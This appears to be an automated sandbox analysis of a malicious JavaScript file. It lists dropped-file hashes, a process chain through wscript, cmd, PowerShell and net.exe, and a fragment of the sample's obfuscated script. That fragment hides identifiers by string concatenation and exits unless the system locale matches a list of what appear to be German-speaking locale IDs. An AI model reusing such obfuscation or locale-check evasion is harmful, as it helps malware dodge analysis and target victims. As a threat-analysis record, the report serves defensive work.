Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.667200053771062 |
Encrypted: | false |
SSDEEP: | 24:Yv6X6ezvdamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSmhYn:YvW5BgkDMUJUAh8cvMmOn |
MD5: | 0D3879D3B5F29D6EF3EC4DEE9A647665 |
SHA1: | 674A9E649233D1BA8A39F65F1CDF223E1BBF1C18 |
SHA-256: | BD284A9DCB06062B94DA15664372FF7CDB668C92862941828893A5B7D5E44FDC |
SHA-512: | 631CC38476255C94C45C3729F69BB2D90785938CA1F086D35F9A244C33EAF673A6C7E7CC2645FFAC7A7F78E9636D185E03BA700F1C75355B01E668B7F491E53D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2895215400711795 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJfshHHrPeUkwRe9:YvXKXPUXeZc0vIGUUUkee9 |
MD5: | A520F836D7C81271D0ADAB3F133E15BA |
SHA1: | 82E9E9032860D3B3733A55A0F0F03A5B12FF2B02 |
SHA-256: | 857DCA755FC428274DBBAA293B39A4F46A388CAF8B272BB26E331C84BA681CCB |
SHA-512: | 1ED2B7DBD5E230FE13A2E3EEC0E83077178E1DC92A1E4DCCDE609D55E3E381DEA4B7B9F89C5D70A34857BF23EA50B5429847054E59C7FA80995CA2D8F4F5E337 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.299308517937439 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPUf/BiyVoZcg1vRcR0YbUtoAvJTqgFCrPeUkwRe9:YvXKXPUXeZc0vIGTq16Ukee9 |
MD5: | 6EB5FDAB5D49323DD025063E5652DC99 |
SHA1: | 5B506952B5DF1A52B95A914EB0987E8820F9E1C7 |
SHA-256: | 73E42C7E1F1AE1740725B72288B113BF572C176BE9C0F62BA3A8FE0081820A3A |
SHA-512: | D30F2B84A30E5CE8CC9F3FF46276B2291519F12BAC300653B478FEFBDD1AA3B378B6CFFECEBC6CDE98420B99FCB0B5BD7DB4DFA46A7FC1967605294087CECA1D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.132691257875449 |
Encrypted: | false |
SSDEEP: | 48:Y+PH1zbGgp9B6pE1zWA/P1uja6ll03Pl6mgqXvQai+LLv9H/zjG:1H1zbGgp9B6pE1zWA/Nuj7lWduqXvHLg |
MD5: | 9E5BEC659B10D5E39A3C90BAEAB42DDA |
SHA1: | 393F9B3AD9D993D51E517E8FD13EE30568A2D0DB |
SHA-256: | B8107782495536A69F34D0318867425A800D52542988064C18B399DC929B00C4 |
SHA-512: | C401DDA3169582357EC9431AB3F253A1507817B0F95BF62592887BAC79415AFA94D1B3A7DC2273649A5DF7B2713595C232792F8E3FAC8C8AC81CB6C4DA769C26 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1881939432398603 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUDSvR9H9vxFGiDIAEkGVvp6:lNVmswUUUUUUUUD+FGSItO |
MD5: | E152CE769ED9D4CFC6B29BA78DEABFB9 |
SHA1: | DE03099E797AD3CAD354E3FDE6B98B069909601C |
SHA-256: | 18B71471EA1A7D2C82C0934E16F500E526B5F821EE63E44FD4014A16B28187A7 |
SHA-512: | 5F4D273A110B41E662CC23129A63F7893F11E111FF53BB60A0A28AE9C78A33D37A8F0A93BD69CE284745358F8EBFDF9A92D75A1C645668CF5EA232645FBFCC1B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.606160499674735 |
Encrypted: | false |
SSDEEP: | 48:7M8KUUUUUUUUUUnvR9H9vxFGiDIAEkGVvJqFl2GL7ms4:7cUUUUUUUUUUfFGSIt3KVms4 |
MD5: | 59CD1CC5872C04236581F6CB0E2144EB |
SHA1: | 1D81B376BC4D2B0D0D792A9B8D8B45563B3FAC5D |
SHA-256: | C843B116B0817C2E203B4126D834ADC9485CDE0637A40D052D9D622274DA106A |
SHA-512: | 069CA9A3011D9A1F7DEC650DF85207019AB3E906273AC49C6CD0FCDD0E6586695EDCD8C9769689F0F5A421C02A1C6E2D725DE604B59E7837217E9A5E341CA13C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEg8MEg5w+RS1A685dVyUkfNeXQA53Yyu:6a6TZ44ADE8Mn5w+c1A6qNr53K |
MD5: | 0A8E587E9BFBCE4468CA80CCFB131067 |
SHA1: | 1F75BC84F3539615EA0A885ADD02B98F2276E292 |
SHA-256: | 70AEFB4773942FF321FAED4FAAE17FAE6B6B6F57A2BF9DFE4FADE0E6F907A6FC |
SHA-512: | FCD9CD5946CCCDC06F6B32B03F582B6B66F1CD9E4042892163BC74B22A416CC8491E0B34BF5F879F7989B8480C0D8E71305BA7AD0BFBBD841406D4DC64253512 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.537590009309966 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEgDl:Qw946cPbiOxDlbYnuRK+bDgR |
MD5: | 6E8D0F910318FF1331B9565D5E4A52D0 |
SHA1: | D8F759F2630DB160ADE033CBB5E4A74CAEE39C67 |
SHA-256: | 27C14946B6872B9E8EA972B57E76B458896B029D36E6810B89F4556214DD9A20 |
SHA-512: | 35C45351D35AB7EF665484EB3CA288A061D9665C3A4A0559B305E79C739AC85A112DA9D9C7BC4BC317865D9E90C37E336698934D56EF7B496359EFDE23CF4098 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 19-58-28-741.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15111 |
Entropy (8bit): | 5.3659397653335335 |
Encrypted: | false |
SSDEEP: | 384:5VZkQsp6JN2lwewvKCpxmohc0vAqsg7gTgiyd4M2+OZrP5itERZbWwhajaP2RHF6:fZ2J |
MD5: | DAECBD702E719BFEDEEB4103A596C44F |
SHA1: | B5F987D0F616013A24BF8438918A7F25A316F1DB |
SHA-256: | FEB53FD4EAF3A2B079412F339AD3706BBECFFA35ED21BA9EB31E34779C263184 |
SHA-512: | 77D706746876B7AAAE57D6927E93C8FED373432FD4E86331D923B2683BC8CAB0F1D9CF954623B32788119E2DEB6BB1682A5259D83B658DE3887A4230A8C6788C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.389506507070309 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r2:/q |
MD5: | 5940017917CF0BC35E2362B8DE0A88BE |
SHA1: | 64BA520EE3A4F1EE3D15DAFB6072F25D6E83ECE8 |
SHA-256: | ECFE456F9E789836D5567049DF37C7300F23E4A1842FD3C88AF31568CE2DF30D |
SHA-512: | 777CA962BEDEB04EED27E70C284A0752AEF58FF3B3C4D512A0B8BC7BCC5E843A4BADC1A8D30F8028EA307A7D423E832C22B3EE3BDD435CB47A63FD073AC2D9F7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+fBYCERXTJJl:O3Pjegf121YS8lkipdjMMNB1DofjEGJH |
MD5: | BAEB02CA18ECB74EF8E03548852D207E |
SHA1: | 938A6EC3EDE559AC243A95F30E8AB9FC7B0FCCFF |
SHA-256: | 6600D8F4A7E866FBB4A67A02983976662050AF139C88C978748CC221E899E92D |
SHA-512: | 1E7BE870ED21E20E9DA74C71B57C2BC6A41AB0039DD45DB76115157C1F97D6DE581DBBBA25B9FF3D55E3A164498A9E92A609B1F11586BEDFE9EF150BD607E8CC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xLtwYIGNPzWL07o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:JJwZG5WLxB3mlind9i4ufFXpAXkrfUsb |
MD5: | D38CB76360DDA78820460E5C5F20061C |
SHA1: | F2B65831130B70F2A3DC345F70C4BEEDE9AB40E8 |
SHA-256: | 55E70B5D5F8BE28D648BCDFE7DEB02BF4BBE2F626D620D4D838E0FA4FBF45F8E |
SHA-512: | 5E31738169A6FE92062B0E582489DEEAC2FA1798965DED94EFA994965470A15B5095851701E4DF631C5EC4454913272F1156EC46B32DA782D3C0F9E490C129A1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:6D0WL07oDGZswYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:c0WLxDGZswZGh3mlind9i4ufFXpAXkru |
MD5: | 585EFF39D9FEF7183354805AFC2389B2 |
SHA1: | 4D8B1386D70227DC30C7B4AF0F1053E5ABFF4F23 |
SHA-256: | E901E0C2BCDF07BB5AF8DC0DDF23CB297BDD05EC1D1FB7FF867F7D25E59CFCF2 |
SHA-512: | E61921615AB814A84E2A4FFCCBFB8D2CBB5BBAEE3FE5632BCD9BF585AF407CE476B8A68BE0AB89259275223F6D1B21B73648BB8DE6683A118DA634EE31C9C00F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.918390898588438 |
TrID: | |
File name: | 9742962732217849.js |
File size: | 21'181 bytes |
MD5: | 42cf20101ec35488eb1cee104705f2ec |
SHA1: | 4340a92491605019bfd0abf12d06b3e72ee4ea37 |
SHA256: | c786a2f6e6ff115da675ceae22cd9c312c01d1a4444c2ab5df639eb9f0224e53 |
SHA512: | 78d2169d785699d677d32e669a54538ef2e4d8e5490d19cab6c0823523cc138ca7b2662c7eb8537bc491b4e7aa64a0de34bf2ef34348ab8d42cf1356e270036d |
SSDEEP: | 192:rzfYK7CEoXb9S7joe0ron0joRJRtdRt7cW0Q40rM8+SZvj5FdV0ZPKoMDPG8CDe9:QRbIG497cW0Q4yRPiQG5pyJkv67fdEYZ |
TLSH: | 68929384D0F2D726D9E01AF9768A18D793D443ED8B31A0DB1CAA32F58ACC71939CA175 |
File Content Preview: | function mahoer(){mtedsiid=[1031,3079,5127,4103,2055,3072];var ikpbu=this[kvqkynxw+hjavqonuz+ancbb+tjfonvx+kvwoszwpd+gtgkkfeqz+xrtpofy+pkxsmsqfo](this[ygarh+qalzqz+weeru+ancbb+legpsrvrs+kvqkynxw+pkxsmsqfo][bpzqdzr+ancbb+kvwoszwpd+hjavqonuz+pkxsmsqfo+kvwos |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 19:58:19 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ba7c0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 19:58:20 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60a3b0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 19:58:20 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 19:58:20 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 19:58:25 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 19:58:25 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60a3b0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 19:58:25 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6fe0a0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 19:58:26 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 19:58:27 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 19:58:27 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function mahoer() { |
|
1 | mtedsiid = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var ikpbu = this[kvqkynxw + hjavqonuz + ancbb + tjfonvx + kvwoszwpd + gtgkkfeqz + xrtpofy + pkxsmsqfo] ( this[ygarh + qalzqz + weeru + ancbb + legpsrvrs + kvqkynxw + pkxsmsqfo][bpzqdzr + ancbb + kvwoszwpd + hjavqonuz + pkxsmsqfo + kvwoszwpd + ccumsk + dobaz + lfjko + kvwoszwpd + weeru + pkxsmsqfo] ( ygarh + qalzqz + weeru + ancbb + legpsrvrs + kvqkynxw + pkxsmsqfo + iroenlr + qalzqz + iprznjdq + kvwoszwpd + kfvpxyn + kfvpxyn ) [duyrzlr + kvwoszwpd + ftsgbws + duyrzlr + kvwoszwpd + hjavqonuz + dtbmt] ( tqscg + pphjv + qdpiqe + jpljjerci + gsvlt + bpzqdzr + ulnwkba + duyrzlr + duyrzlr + qdpiqe + ciinnh + oyhewto + gsvlt + ulnwkba + qalzqz + qdpiqe + duyrzlr + nnvhmwxk + bpzqdzr + nldbrk + xrtpofy + pkxsmsqfo + ancbb + nldbrk + kfvpxyn + iiuepuuc + whatawre + hjavqonuz + xrtpofy + kvwoszwpd + kfvpxyn + nnvhmwxk + gtgkkfeqz + xrtpofy + pkxsmsqfo + kvwoszwpd + ancbb + xrtpofy + hjavqonuz + pkxsmsqfo + legpsrvrs + nldbrk + xrtpofy + hjavqonuz + kfvpxyn + nnvhmwxk + jelolk + nldbrk + weeru + hjavqonuz + kfvpxyn + kvwoszwpd ), 16 ); |
|
3 | for ( sgmxfnh = 0 ; sgmxfnh < mtedsiid[kfvpxyn + kvwoszwpd + xrtpofy + ftsgbws + pkxsmsqfo + iprznjdq] ; ++ sgmxfnh ) | |
4 | { | |
5 | if ( ikpbu == mtedsiid[sgmxfnh] ) | |
6 | { | |
7 | ikpbu = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( ikpbu !== true ) | |
12 | this[ygarh + qalzqz + weeru + ancbb + legpsrvrs + kvqkynxw + pkxsmsqfo][vwiyyysc + tihispf + legpsrvrs + pkxsmsqfo] ( ); | |
